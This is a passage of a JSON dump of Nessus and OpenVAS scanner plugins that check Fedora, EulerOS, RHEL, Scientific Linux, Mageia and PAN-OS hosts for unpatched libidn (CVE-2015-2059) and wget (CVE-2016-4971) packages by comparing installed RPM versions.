script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"libidn-1.31-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libidn\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T07:07:27", "bulletinFamily": "scanner", "description": "Security fix for CVE-2015-2059\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "FEDORA_2015-11562.NASL", "href": "https://www.tenable.com/plugins/nessus/85060", "published": "2015-07-29T00:00:00", "title": "Fedora 22 : libidn-1.31-1.fc22 (2015-11562)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-11562.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85060);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:49:05 $\");\n\n script_cve_id(\"CVE-2015-2059\");\n script_xref(name:\"FEDORA\", value:\"2015-11562\");\n\n script_name(english:\"Fedora 22 : libidn-1.31-1.fc22 (2015-11562)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-2059\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1197796\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-July/162549.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bcc9630f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libidn package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libidn\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"libidn-1.31-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libidn\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-17T22:28:26", "bulletinFamily": "scanner", "description": "According to the version of the libidn package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - The stringprep_utf8_to_ucs4 function in libin before\n 1.31, as used in jabberd2, allows context-dependent\n attackers to read system memory and possibly have other\n unspecified impact via invalid UTF-8 characters in a\n string, which triggers an out-of-bounds\n read.(CVE-2015-2059)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "EULEROS_SA-2019-1454.NASL", "href": "https://www.tenable.com/plugins/nessus/124957", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : libidn (EulerOS-SA-2019-1454)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124957);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\n \"CVE-2015-2059\"\n );\n script_bugtraq_id(\n 72736\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : libidn (EulerOS-SA-2019-1454)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libidn package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - The stringprep_utf8_to_ucs4 function in libin before\n 1.31, as used in jabberd2, allows context-dependent\n attackers to read system memory and possibly have other\n unspecified impact via invalid UTF-8 characters in a\n string, which triggers an out-of-bounds\n read.(CVE-2015-2059)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1454\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3af82292\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libidn package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libidn\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libidn-1.28-4.2.h4.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libidn\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T01:38:00", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following an HTTP\n redirect to a FTP server resource. This could cause wget\n to create a file with a different name than expected,\n possibly allowing the server to execute arbitrary code\n on the client. (CVE-2016-4971)", "modified": "2020-01-02T00:00:00", "id": "SL_20161103_WGET_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/95865", "published": "2016-12-15T00:00:00", "title": "Scientific Linux Security Update : wget on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95865);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2019/04/11 17:23:07\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"Scientific Linux Security Update : wget on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following an HTTP\n redirect to a FTP server resource. This could cause wget\n to create a file with a different name than expected,\n possibly allowing the server to execute arbitrary code\n on the client. (CVE-2016-4971)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1612&L=scientific-linux-errata&F=&S=&P=7504\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ff28d729\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-01T01:14:54", "bulletinFamily": "scanner", "description": "An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.", "modified": "2020-01-02T00:00:00", "id": "REDHAT-RHSA-2016-2587.NASL", "href": "https://www.tenable.com/plugins/nessus/94550", "published": "2016-11-04T00:00:00", "title": "RHEL 7 : wget (RHSA-2016:2587)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2587. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94550);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-4971\");\n script_xref(name:\"RHSA\", value:\"2016:2587\");\n\n script_name(english:\"RHEL 7 : wget (RHSA-2016:2587)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for wget is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe wget packages provide the GNU Wget file retrieval utility for\nHTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es) :\n\n* It was found that wget used a file name provided by the server for\nthe downloaded file when following an HTTP redirect to a FTP server\nresource. This could cause wget to create a file with a different name\nthan expected, possibly allowing the server to execute arbitrary code\non the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-4971\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wget and / or wget-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2587\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-13.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:37:06", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2015-0349", "modified": "2018-09-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130038", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130038", "title": "Mageia Linux Local Check: mgasa-2015-0349", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0349.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130038\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:41:51 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0349\");\n script_tag(name:\"insight\", value:\"Updated libidn packages fix security vulnerability: In libidn before 1.31, stringprep_utf8_to_ucs4 did not validate that the input UTF-8 string was actually valid UTF-8, which could lead to out-of-bounds reads (CVE-2015-2059).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0349.html\");\n script_cve_id(\"CVE-2015-2059\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0349\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"libidn\", rpm:\"libidn~1.32~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "description": "The wget library has been found to contain a vulnerability.", "modified": "2018-10-26T00:00:00", "published": "2017-05-23T00:00:00", "id": "OPENVAS:1361412562310106827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106827", "title": "Palo Alto PAN-OS WGET Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_panos_pan_sa-2017_0016.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Palo Alto PAN-OS WGET Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:paloaltonetworks:pan-os';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106827\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-23 15:33:39 +0700 (Tue, 23 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Palo Alto PAN-OS WGET Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Palo Alto PAN-OS Local Security Checks\");\n script_dependencies(\"gb_palo_alto_panOS_version.nasl\");\n script_mandatory_keys(\"palo_alto_pan_os/version\");\n\n script_tag(name:\"summary\", value:\"The wget library has been found to contain a vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"wget allows remote servers to write to arbitrary files by redirecting 